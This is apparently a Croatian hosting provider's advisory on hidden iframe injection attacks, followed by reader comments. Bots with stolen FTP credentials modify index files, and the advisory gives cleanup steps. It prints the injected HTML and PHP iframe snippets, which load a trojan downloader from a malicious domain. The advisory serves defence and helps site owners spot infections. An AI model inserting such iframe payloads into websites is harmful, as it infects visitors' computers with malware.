Zadnjih par tjedana u toku su iframe napadi koji u index.* fileove ubacuju iframe veličine 1×1 piksela.
Što radi iframe?
Kao što se vidi iz koda, veličina iframea je 1×1 piksel i otvara sadržaj s goooogleadsence.biz ili neke druge stranice, zavisno od slučaja do slučaja. Taj iframe učitava downloader, koji onda skida trojanca koji “naseli” Vaše računalo.
Tipični primjeri su:
HTML stranice
<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
PHP stranice
echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
Sada se većina Vas pita, kako je moguće da netko modificira moje webove? Zar nemate nikakvu zaštitu na serverima?
Sam propust nije na serveru, nego kod samog korisnika. Pregledom logova za svaki slučaj napada koji smo imali, primijetili smo da se napadač (bot) uredno ulogirao na FTP, downloadao index.* file, izmijenio ga i uploadao nazad na server. Naravno, logiranje se svaki put vršilo sa drugačije IP adrese, te je teško (čitaj: nemoguće) predvidjeti logiranje i blokiranje pristupa toj IP adresi.
Koje je rješenje ovog problema?
U ovom trenutku, izmjena passworda za FTP i cPanel pristup, te čišćenje računala. Ako je vaš web pogođen ovim problemom, kontaktirajte našu službu za korisnike. Mi ćemo izmijeniti password od FTP-a i cPanela, te očistiti vaše web stranice. Od korisnika se zahtijeva da skenira računalo s nekim kvalitetnim antivirusnim alatom (Avira, AVG, Kaspersky, NOD, itd..) s najsvježijim updateovima.
Kada korisnik potvrdi da mu je računalo čisto, mailom ili support ticketom može zatražiti novi password od FTP-a /cPanela.
Da li će ovaj problem utjecati na moj ranking na tražilicama?
Pa, ako ne primijetite problem i on ostane na webu duže vremena nesaniran – da, Vaš rank na tražilicama će pasti, a oni posjetitelji koji dođu direktno na vaš web bit će upozoreni da stranica može naštetiti računalu. To će direktno imati za posljedicu manje posjeta, loš ugled, te u krajnjoj liniji manje posla ako se vaše poslovanje bazira na web stranicama. Ako primijetite bilo kakvu anomaliju na vašem webu, odmah kontaktirajte našu službu za korisnike koja će istražiti problem.
Ako se nakon promjene passworda i čišćenja računala problem i dalje javlja, znači da vam računalo nije još potpuno čisto. Čišćenje bi trebalo napraviti s par alata, tako da se eliminira problem s antivirusnim softwareom koji koristite.
Stavljamo i linkove na par web stranica koje obrađuju istu tematiku:
Hidden iframe injection attacks | Diovo
Iframe injection – nova glavobolja za webmastere | wm.com.hr
Jedan zanimljivi post na Google Online Security blogu:
Ugh da neugodni su napadi, ja sam ih počeo “ručno” riješavati 🙂
Ja nemam problema s tim. Koristim ubuntu linux i do sada nisam imao nikakvih problema. 😉
Meni je ovaj virus zarazio jednu web stranicu i forum, ali su mi odmah izašli u susret sa hostinga i riješili problem, a ja sam sam rješio problem na forumu u index.php file. Neka luda java skripta. Kad se otvori u eksploreru počnu iskakati prozori kao da nešto želi instalirati od programa iz windowsa. U firefoksu ga je označio kao malicious site. zaražena stranica. To sam isto rješio na način da sam u webmaster tools ponovo zatražio inspekciju stranice nakon što sam maknuo skripte. Tada sam pobrisao sve pasvorde sa računala. Ali ovdje sam saznao da moram maknuti i pasvorde sa log in formi.
Sretno svima
Pregledala sam svoju web stranicu, pregledala je s Avirom i nema nikakvih takvih izmjena. Sve je o.k.
Hvala na infu.
ćajos, sretno svima
Zaštita s korisničke strane može biti korištenje Firefoxa i NoScript add-ona, u kojem treba aktivirati opciju blokiranja IFramea.
Koristim Ubuntu linux i nisam iskusio još nikakvih problema sličnih ovom. Nikad si ne mogu dovoljno puta čestitati na odluci što sam prešao na Ubuntu u cjelosti 😀
Khm … izgleda da mi je ipak site unatoč linuxu podlegao napadu. Kada kliknem u googlu na moj link otvara mi p3p0.com, a ljudi koji koriste vindowse javljaju mi da im se pali upozorenje antivirusa o trojanu JS:FakeAV-DX[Trj]. Gledao php ali nigdje nisam pronasao problem 🙁 …. ima li tko ideja?